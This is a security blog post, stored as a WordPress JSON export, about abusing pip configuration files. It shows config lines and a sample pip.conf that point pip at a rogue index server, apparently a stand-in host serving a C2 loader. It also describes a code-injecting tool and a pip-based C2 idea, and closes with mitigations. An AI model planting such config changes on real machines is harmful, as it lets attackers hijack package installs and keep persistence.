{"id":57130,"date":"2024-09-18T17:57:13","date_gmt":"2024-09-18T17:57:13","guid":{"rendered":"https:\/\/packetstormsecurity.com\/news\/view\/36354\/Pip-Dreams-And-Security-Schemes-Chaos-In-Your-Configuration-Files.html"},"modified":"2024-09-18T17:57:13","modified_gmt":"2024-09-18T17:57:13","slug":"pip-dreams-and-security-schemes-chaos-in-your-configuration-files","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\/","title":{"rendered":"Pip Dreams And Security Schemes: Chaos In Your Configuration Files"},"content":{"rendered":"<p><span>In the world of Python development, pip is an indispensable tool for managing packages and dependencies. While it simplifies many aspects of package management, there are risks associated with using pip configuration files (pip.conf or pip.ini) that developers and those that manage systems that utilize it should be aware of.<\/span><\/p>\n<p><span><img loading=\"lazy\" alt=\"Not pip from Southpark, Pip for python\" width=\"300\" height=\"126\" nitro-lazy-src=\"https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/2-pips-300x126.png\" class=\"size-medium wp-image-2414 alignright nitro-lazy\" decoding=\"async\" nitro-lazy-empty id=\"NDc5OjI2OQ==-1\" src=\"data:image\/svg+xml;nitro-empty-id=NDc5OjI2OQ==-1;base64,PHN2ZyB2aWV3Qm94PSIwIDAgMzAwIDEyNiIgd2lkdGg9IjMwMCIgaGVpZ2h0PSIxMjYiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PC9zdmc+\"><\/span><\/p>\n<p><span>Much has been said about the dangers lurking in malicious Python packages and the risks posed by command line and environmental variables. But what about the lesser-discussed yet equally critical pip configuration files? We\u2019ll explore the potential for using compromised pip settings to quietly install additional tools post-compromise, turning a seemingly innocuous configuration file into a powerful instrument of attack.<\/span><\/p>\n<h2><strong><span>Pip Hierarchy<\/span><\/strong><\/h2>\n<p><span>To understand how pip is utilized within an environment it is important to understand the various methods in which default behavior can be changed. Pip can be used in a variety of ways to set which index server it will communicate with, such as, if pip will cache responses as well as if it will require a virtual environment and more.&nbsp;&nbsp;<\/span><\/p>\n<p><span>These methods can be broken down into three groups:<\/span><\/p>\n<ul>\n<li><span>Command line variables<\/span><\/li>\n<li><span>Environmental variables<\/span><\/li>\n<li><span>Configuration files<\/span><\/li>\n<\/ul>\n<p><span>The hierarchy in which these groups take precedence are the same order as written above and as demonstrated below.<\/span><\/p>\n<ul>\n<li aria-level=\"1\"><span><b>Command line variable:<\/b> \u2018\u2013index-url = foo\u2019 overrides&nbsp; <b>Environmental variable<\/b> \u2018index-url = foo\u2019<\/span><\/li>\n<li aria-level=\"1\"><span><b>Environmental variable<\/b>: \u2018trusted-host = example.com\u2019 overrides a <b>Configuration file<\/b> with \u2018[global] trusted-host = example.com\u2019<\/span><\/li>\n<\/ul>\n<p><span><b>Configuration files: <\/b>Except for command specific settings such as [install], these settings have a hierarchy of their own as detailed below.<\/span><\/p>\n<h2><span><strong class=\"nitro-lazy\">Understanding Pip Configuration Files<\/strong><\/span><\/h2>\n<p><span>Pip configuration files allow developers and admins to set default options for pip commands. These settings can include specifying package indexes, setting installation directories, and configuring proxy settings.&nbsp;<\/span><\/p>\n<p><span>According to pip documentation (https:\/\/pip.pypa.io\/en\/stable\/topics\/configuration\/#config-precedence), the loading order or hierarchy of various configuration files is defined as follows:<\/span><\/p>\n<ul>\n<li><span>&nbsp;&nbsp;&nbsp;&nbsp;Global<\/span><\/li>\n<li><span>&nbsp;&nbsp;&nbsp;&nbsp;User<\/span><\/li>\n<li><span>&nbsp;&nbsp;&nbsp;&nbsp;Site<\/span><\/li>\n<li><span>&nbsp;&nbsp;&nbsp;&nbsp;PIP_CONFIG_FILE, if given (This is per directory of a given Python project)<\/span><\/li>\n<\/ul>\n<p><span>An example of a configuration file is shown below:<\/span><\/p>\n<pre>[global]\ndefault-timeout = 60\nrespect-virtualenv = true\ndownload-cache = \/tmp\nlog-file = \/tmp\/pip-log.txt [install]\nfind-links =\n&nbsp;&nbsp;&nbsp;http:\/\/pypi.example.com &nbsp;&nbsp;http:\/\/pypi2.example.com<\/pre>\n<p><span>Configuration files can be located in various locations. To discover what your system is utilizing in this regard simply type the following \u2018pip config -v list\u2019. This will output which global, user and site configuration files that are in use.<\/span><\/p>\n<h3><span>Linux Example<\/span><\/h3>\n<p><img fetchpriority=\"high\" alt=\"pip config files linux\" width=\"533\" height=\"128\" sizes=\"(max-width: 533px) 100vw, 533px\" nitro-lazy-srcset=\"https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/Linux-config-file-example-1-300x72.png 300w, https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/Linux-config-file-example-1.png 468w\" nitro-lazy-src=\"https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/Linux-config-file-example-1-300x72.png\" class=\"alignnone wp-image-2422 nitro-lazy\" decoding=\"async\" nitro-lazy-empty id=\"NTE3OjQ1NA==-1\" src=\"data:image\/svg+xml;nitro-empty-id=NTE3OjQ1NA==-1;base64,PHN2ZyB2aWV3Qm94PSIwIDAgMzAwIDcyIiB3aWR0aD0iMzAwIiBoZWlnaHQ9IjcyIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjwvc3ZnPg==\"><\/p>\n<h3><span>Windows Example<\/span><\/h3>\n<p><img loading=\"lazy\" alt=\"Windows config example\" width=\"529\" height=\"127\" sizes=\"auto, (max-width: 529px) 100vw, 529px\" nitro-lazy-srcset=\"https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/Windows-config-example-1-300x72.png 300w, https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/Windows-config-example-1.png 468w\" nitro-lazy-src=\"https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/Windows-config-example-1-300x72.png\" class=\"alignnone wp-image-2423 nitro-lazy\" decoding=\"async\" nitro-lazy-empty id=\"NTE5OjQyNA==-1\" src=\"data:image\/svg+xml;nitro-empty-id=NTE5OjQyNA==-1;base64,PHN2ZyB2aWV3Qm94PSIwIDAgMzAwIDcyIiB3aWR0aD0iMzAwIiBoZWlnaHQ9IjcyIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjwvc3ZnPg==\"><\/p>\n<p><span>Let\u2019s take a step back to understand what we are dealing with. Within this environment, \u2018user\u2019 is the second group of configuration files that are loaded when using the pip command.&nbsp; However, if a configuration option isn\u2019t defined in \u2018global\u2019, the user configuration will take precedence.&nbsp;&nbsp;<\/span><\/p>\n<p><span>The actual location of configuration files, that pip expects, can be checked by utilizing the command \u2018pip config debug\u2019. As shown in the next example, these file locations that pip expects, may not actually exist. This allows a user to create and define settings within them, if restrictions are in place to modify existing pip configuration files.<\/span><\/p>\n<p><img loading=\"lazy\" alt=\"global pip config file\" width=\"536\" height=\"300\" sizes=\"auto, (max-width: 536px) 100vw, 536px\" nitro-lazy-srcset=\"https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/global-config-file-3-300x168.png 300w, https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/global-config-file-3.png 468w\" nitro-lazy-src=\"https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/global-config-file-3-300x168.png\" class=\"alignnone wp-image-2424 nitro-lazy\" decoding=\"async\" nitro-lazy-empty id=\"NTIyOjQxNA==-1\" src=\"data:image\/svg+xml;nitro-empty-id=NTIyOjQxNA==-1;base64,PHN2ZyB2aWV3Qm94PSIwIDAgMzAwIDE2OCIgd2lkdGg9IjMwMCIgaGVpZ2h0PSIxNjgiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PC9zdmc+\"><\/p>\n<p><span>As shown above, the global configuration file named \u2018<em>\/etc\/pip.conf<\/em>\u2019 exists with a directive to use a specific \u2018extra-index-url\u2019.&nbsp; This allows the user to set an \u2018index-url\u2019 as it has not been defined yet.<\/span><\/p>\n<h2><strong><span>Pip Exploitation<\/span><\/strong><\/h2>\n<p><span>So now that we know more about pip hierarchies and how configuration files are constructed, let\u2019s start abusing them. To instruct pip to use a certain index server, trust a host or check for additional packages we can define these within a configuration file.&nbsp; The following are very useful when attempting to subvert pip as they define which index servers to use, when a user asks for a package.<\/span><\/p>\n<pre>index-url = https:\/\/example.com\/simple\nextra-index-url = https:\/\/example.com\/simple\ntrusted-host = example.com\nfind-links = https:\/\/example.com\/packages<\/pre>\n<p><span>It can be useful to prevent pip from using cached packages with the following so that we can inject into packages that have already been installed before, with the following.<\/span><\/p>\n<pre>no-cache-dir = true<\/pre>\n<p><span>Additionally we can ensure that a virtual environment is not required with the following. This will allow for execution of code on the base system as opposed to being stuck in a Python virtual environment.<\/span><\/p>\n<pre>require-virtualenv = false<\/pre>\n<p><span>Note: When a user is executing pip after changing their configuration file, the index server that it is communicating with is displayed within the console. This could alert the user that something malicious is happening. As is done in some phishing engagements, purchasing a domain that looks similar to the actual pypi server in use could prove beneficial.<\/span><\/p>\n<h2>Oneliner Examples<\/h2>\n<p><span>The ability to execute code within a setup.py file in Python packages is well documented however we will show how it can be utilized within a configuration file. Through pip, we can execute an agent, tool, or other malicious package with the following:<\/span><\/p>\n<h3><span>Linux Example<\/span><\/h3>\n<p><img loading=\"lazy\" alt=\"Linux oneliner example\" width=\"525\" height=\"77\" sizes=\"auto, (max-width: 525px) 100vw, 525px\" nitro-lazy-srcset=\"https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/Linux-oneliner-example-4-300x44.png 300w, https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/Linux-oneliner-example-4.png 468w\" nitro-lazy-src=\"https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/Linux-oneliner-example-4-300x44.png\" class=\"alignnone wp-image-2425 nitro-lazy\" decoding=\"async\" nitro-lazy-empty id=\"NTM4OjQyMw==-1\" src=\"data:image\/svg+xml;nitro-empty-id=NTM4OjQyMw==-1;base64,PHN2ZyB2aWV3Qm94PSIwIDAgMzAwIDQ0IiB3aWR0aD0iMzAwIiBoZWlnaHQ9IjQ0IiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjwvc3ZnPg==\"><\/p>\n<h3><span>Windows Example<\/span><\/h3>\n<p><img loading=\"lazy\" alt=\"Windows oneliner example\" width=\"514\" height=\"108\" sizes=\"auto, (max-width: 514px) 100vw, 514px\" nitro-lazy-srcset=\"https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/Windows-oneliner-example-5-300x63.png 300w, https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/Windows-oneliner-example-5.png 468w\" nitro-lazy-src=\"https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/Windows-oneliner-example-5-300x63.png\" class=\"alignnone wp-image-2426 nitro-lazy\" decoding=\"async\" nitro-lazy-empty id=\"NTQwOjQzMg==-1\" src=\"data:image\/svg+xml;nitro-empty-id=NTQwOjQzMg==-1;base64,PHN2ZyB2aWV3Qm94PSIwIDAgMzAwIDYzIiB3aWR0aD0iMzAwIiBoZWlnaHQ9IjYzIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjwvc3ZnPg==\"><\/p>\n<p><span>So from the Windows and Linux examples above, we are doing a few things:<\/span><\/p>\n<ul>\n<li><span>Setting an index url&nbsp;<\/span><\/li>\n<li><span>Setting no-cache-dir to true<\/span><\/li>\n<li><span>Setting require-virtualenv to false<\/span><\/li>\n<li><span>After which we install the defined package from our pypi server. (which is just a loader for a c2 agent)<\/span><\/li>\n<\/ul>\n<p><span>This also has the benefit from a Red Team perspective over using command line variables, as it does not reveal the index server within process exploration, except when initially changing the configuration file.<\/span><\/p>\n<h2><span>Rogue Pypi<\/span><\/h2>\n<p><span>So what happens when a user\u2019s configuration file is changed by a malicious actor to point to a rogue index server?&nbsp; To test this, Osec developed a tool called Pypigeon that allows an attacker to inject Python code into the requested package as well as to host tooling that could prove useful during a Red team engagement.<\/span><\/p>\n<p><span>For this example, we start by injecting our rogue index server into \u2018<em>\/home\/user\/.config\/pip\/pip.conf<\/em>\u2019 after we have determined that this configuration file location will alter pips command line usage. This can be done with a oneliner as shown within the Linux or Windows examples above. No matter which way that this is accomplished, we want the configuration file to point to our rogue index server as shown below.<\/span><\/p>\n<pre>[global]\nindex-url = https:\/\/expectbadness.somemaliciousurl.com:7979\/simple\/\nno-cache-dir = true\nrequire-virtualenv = false<\/pre>\n<p><span>After making the necessary config changes to the pip.conf or pip.ini, we can spin up our rogue index server with a command line option to inject a simple Python print statement within the requested package.<\/span><\/p>\n<p><img loading=\"lazy\" alt=\"rogue index server\" width=\"539\" height=\"284\" sizes=\"auto, (max-width: 539px) 100vw, 539px\" nitro-lazy-srcset=\"https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/updated-config-file-6-300x158.png 300w, https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/updated-config-file-6.png 468w\" nitro-lazy-src=\"https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/updated-config-file-6-300x158.png\" class=\"alignnone wp-image-2427 nitro-lazy\" decoding=\"async\" nitro-lazy-empty id=\"NTU3OjQxMw==-1\" src=\"data:image\/svg+xml;nitro-empty-id=NTU3OjQxMw==-1;base64,PHN2ZyB2aWV3Qm94PSIwIDAgMzAwIDE1OCIgd2lkdGg9IjMwMCIgaGVpZ2h0PSIxNTgiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PC9zdmc+\"><\/p>\n<p><span>Now, anytime the victim user attempts to install a package, our rogue index server will also inject code. Note that the \u2018-ua\u2019 option was selected so that we can see the pip user agent. An interesting note is that the User-Agent supplied by a user\u2019s pip request to an index server gives a lot of information about its environment.&nbsp; One could say it is a built-in C2 beacon callback. Additionally, we have set the rogue pypi server to show the requesting user\u2019s IP address, we have changed this to 0.0.0.0 for this article.<\/span><\/p>\n<p><img loading=\"lazy\" alt=\"injected code \" width=\"538\" height=\"675\" sizes=\"auto, (max-width: 538px) 100vw, 538px\" nitro-lazy-srcset=\"https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/malicious-pip-7-239x300.png 239w, https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/malicious-pip-7.png 468w\" nitro-lazy-src=\"https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/malicious-pip-7-239x300.png\" class=\"alignnone wp-image-2428 nitro-lazy\" decoding=\"async\" nitro-lazy-empty id=\"NTU5OjM5MQ==-1\" src=\"data:image\/svg+xml;nitro-empty-id=NTU5OjM5MQ==-1;base64,PHN2ZyB2aWV3Qm94PSIwIDAgMjM5IDMwMCIgd2lkdGg9IjIzOSIgaGVpZ2h0PSIzMDAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PC9zdmc+\"><\/p>\n<p><span>From the user\u2019s perspective, this is not noticeable, except for the communications with the rogue index server.&nbsp; In practice, on the user\/victim side, nothing would look amiss while using pip how most typical users would use it. However, you could see the output if the verbose, \u201c-v\u201d, flag was used during execution.<\/span><\/p>\n<h2><img loading=\"lazy\" alt=\"verbose pip execution\" width=\"536\" height=\"525\" sizes=\"auto, (max-width: 536px) 100vw, 536px\" nitro-lazy-srcset=\"https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/malicious-pip-8-300x294.png 300w, https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/malicious-pip-8.png 468w\" nitro-lazy-src=\"https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/malicious-pip-8-300x294.png\" class=\"alignnone wp-image-2429 nitro-lazy\" decoding=\"async\" nitro-lazy-empty id=\"NTYxOjM5OQ==-1\" src=\"data:image\/svg+xml;nitro-empty-id=NTYxOjM5OQ==-1;base64,PHN2ZyB2aWV3Qm94PSIwIDAgMzAwIDI5NCIgd2lkdGg9IjMwMCIgaGVpZ2h0PSIyOTQiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PC9zdmc+\"><\/h2>\n<h2><span>Additional research:<\/span><\/h2>\n<p><span>If you want to go further down the rabbit hole and explore more on how pip\u2019s configuration can be abused in interesting ways, these additional ideas and functions could be fun to play with:<\/span><\/p>\n<ul>\n<li aria-level=\"1\"><span>Pip configuration files can be modified per command section, such as [install] or [freeze].<\/span>\n<ul>\n<li aria-level=\"2\"><span>https:\/\/pip.pypa.io\/en\/stable\/topics\/configuration\/#per-command-section<\/span><\/li>\n<\/ul>\n<\/li>\n<li aria-level=\"1\"><span>Can ensurepip() be useful to perform the methods described above?&nbsp;&nbsp;<\/span> <\/li>\n<li aria-level=\"1\"><span>How can we use the PIP_CONFIG_FILE environmental variable?<\/span>\n<ul>\n<li aria-level=\"2\"><span>https:\/\/pip.pypa.io\/en\/stable\/topics\/configuration\/#pip-config-file<\/span><\/li>\n<\/ul>\n<\/li>\n<li aria-level=\"1\"><span>Imagine a c2 agent that requests a random package every so often through pip.&nbsp; When the operator wants to send a command, the package becomes available to install, the pip agent installs it, then uninstalls once the evil deeds are finished.<\/span><\/li>\n<li aria-level=\"1\"><span>Pip allows you to set a log or cache file location, how could this be utilized for nefarious purposes?<\/span><\/li>\n<\/ul>\n<h2><span>Conclusion<\/span><\/h2>\n<p><span>Instead of coaxing a victim to install a malicious package that has been snuck into a pypi server, a malicious actor can create a man in the middle situation by altering pip configuration files.&nbsp; These types of security risks to supply chain security can be introduced through phishing, social engineering or if an initial vulnerability exists that allows for remote code execution.&nbsp; The methods described within this article could undeniably be used for persistence, by utilizing pip as a stager for more advanced backdoors and C2 agents.<\/span><\/p>\n<p><span>Restricting access to configuration files or making configuration files read only can alleviate part of the issue.&nbsp; Another method that has been used is to create a wrapper or proxy for pip that would enforce certain constraints, such as disallowing specific environment variables or options, while disabling direct access to pip itself. However, as detailed, there are many ways that Pip can be used to execute remote code, as such limiting its use in production environments should be encouraged. For systems that require the usage of pip, ensure that it can only connect to approved index servers.<\/span><\/p>\n<p><span>Securing Pip is tricky business, there are environmental and command line variables as well as various configuration file issues to contend with. Even if \u2018index-url\u2019 is set in a global configuration context, a malicious actor can still utilize Pip to ingress malicious packages with \u2018extra-index-url\u2019 or \u2018find-links\u2019. Reviewing how your organization accesses 3rd party packages through pip or other connection gateways should be a priority.<\/span><\/p>\n<p> READ MORE <a href=\"https:\/\/packetstormsecurity.com\/news\/view\/36354\/Pip-Dreams-And-Security-Schemes-Chaos-In-Your-Configuration-Files.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>READ MORE HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":57131,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[60],"tags":[11048],"class_list":["post-57130","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-packet-storm","tag-headlinebackdoor"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Pip Dreams And Security Schemes: Chaos In Your Configuration Files 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Pip Dreams And Security Schemes: Chaos In Your Configuration Files 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2024-09-18T17:57:13+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/cdn-ilakifb.nitrocdn.com\/rJPWEjrZzdPtnxKRcNIjPSfKGCsXYZcq\/assets\/images\/optimized\/rev-5123309\/occamsec.com\/wp-content\/uploads\/2024\/09\/2-pips-300x126.png\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Pip Dreams And Security Schemes: Chaos In Your Configuration Files\",\"datePublished\":\"2024-09-18T17:57:13+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\\\/\"},\"wordCount\":1612,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/09\\\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files.png\",\"keywords\":[\"headline,backdoor\"],\"articleSection\":[\"Packet Storm\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\\\/\",\"name\":\"Pip Dreams And Security Schemes: Chaos In Your Configuration Files 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/09\\\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files.png\",\"datePublished\":\"2024-09-18T17:57:13+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/09\\\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files.png\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/09\\\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files.png\",\"width\":300,\"height\":126},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/pip-dreams-and-security-schemes-chaos-in-your-configuration-files\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"headline,backdoor\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/headlinebackdoor\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Pip Dreams And Security Schemes: Chaos In Your Configuration Files\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity 